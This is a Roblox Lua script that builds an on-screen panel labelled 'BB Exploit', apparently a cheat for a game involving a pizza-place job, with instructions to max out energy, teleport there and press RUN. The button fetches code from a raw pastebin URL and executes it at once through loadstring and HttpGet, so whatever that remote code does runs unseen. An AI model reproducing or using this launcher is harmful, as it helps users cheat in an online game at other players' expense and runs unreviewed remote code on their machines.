local BBExploit = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local TextButton = Instance.new("TextButton")

-- Properties

BBExploit.Name = "BBExploit"
BBExploit.Parent = game.StarterGui

Frame.Parent = BBExploit
Frame.Active = true
Frame.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078)
Frame.Draggable = true
Frame.Position = UDim2.new(0.160377353, 0, 0.190251574, 0)
Frame.Selectable = true
Frame.Size = UDim2.new(0, 287, 0, 211)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078)
TextLabel.Position = UDim2.new(0.149825796, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SciFi
TextLabel.Text = "BB Exploit"
TextLabel.TextColor3 = Color3.new(1, 1, 1)
TextLabel.TextSize = 28

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel_2.BackgroundTransparency = 100
TextLabel_2.BorderColor3 = Color3.new(1, 1, 1)
TextLabel_2.Position = UDim2.new(0.151567936, 0, 0.236966819, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Before starting, make sure you have maximum energy."
TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
TextLabel_2.TextSize = 14

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel_3.BackgroundTransparency = 100
TextLabel_3.BorderColor3 = Color3.new(1, 1, 1)
TextLabel_3.Position = UDim2.new(0.151567936, 0, 0.317535549, 0)
TextLabel_3.Size = UDim2.new(0, 200, 0, 50)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Then, teleport to the pizza place and click Run."
TextLabel_3.TextColor3 = Color3.new(1, 1, 1)
TextLabel_3.TextSize = 14

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.new(1, 1, 1)
TextButton.Position = UDim2.new(0.153310105, 0, 0.60189575, 0)
TextButton.Size = UDim2.new(0, 200, 0, 50)
TextButton.Font = Enum.Font.Cartoon
TextButton.Text = "RUN"
TextButton.TextSize = 40
TextButton.MouseButton1Down:connect(function()
loadstring(game:HttpGet(('https://pastebin.com/raw/JC1nCEjX'),true))()
end)